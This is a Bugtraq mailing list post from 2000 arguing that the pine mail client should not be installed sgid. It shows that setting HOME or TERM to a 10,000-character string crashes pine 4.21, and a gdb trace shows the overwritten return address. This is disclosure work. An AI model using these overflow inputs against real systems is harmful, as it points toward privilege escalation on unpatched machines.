Bugtraq mailing list archives

Previous By Date Next
Previous By Thread Next

Why pine must never be sgid

From: satan () FASTDIAL NET (Stan Bubrouski)
Date: Fri, 23 Jun 2000 14:33:13 -0000

Pine should never be sgid, yet I see it many times
installed sgid mail on many different UNIX and
Linux systems.  Everybody admits pine should not be
sgid but yet I still it sgid on some distributions.
Why shouldn't it be sgid?  A reminder using pine 4.21,
which is the latest version to my knowledge as an
example.
[root@king pine]# export HOME=`perl -e'print "A" x 10000;'`
[root@king pine]# pine
Segmentation fault (core dumped)
[root@king pine]# gdb pine core 
...
Core was generated by `AAAAA'.
Program terminated with signal 11, Segmentation fault.
...
(gdb) where
#0  0x809e273 in strcpy () at ../sysdeps/generic/strcpy.c:30
#1  0x4eb6 in ?? ()
#2  0x41414141 in ?? ()
Cannot access memory at address 0x41414141
(gdb) 

And another:
[root@king pine]# export TERM=`perl -e'print "A" x 10000;'`
[root@king pine]# pine
Can't open termcap file; check TERMCAP variable and/or
system manager.
Segmentation fault (core dumped)

There are countless more, I know everybody knows this
already, so why is pine still sgid on some systems?

-Stan Bubrouski
Previous By Date Next
Previous By Thread Next

Current thread: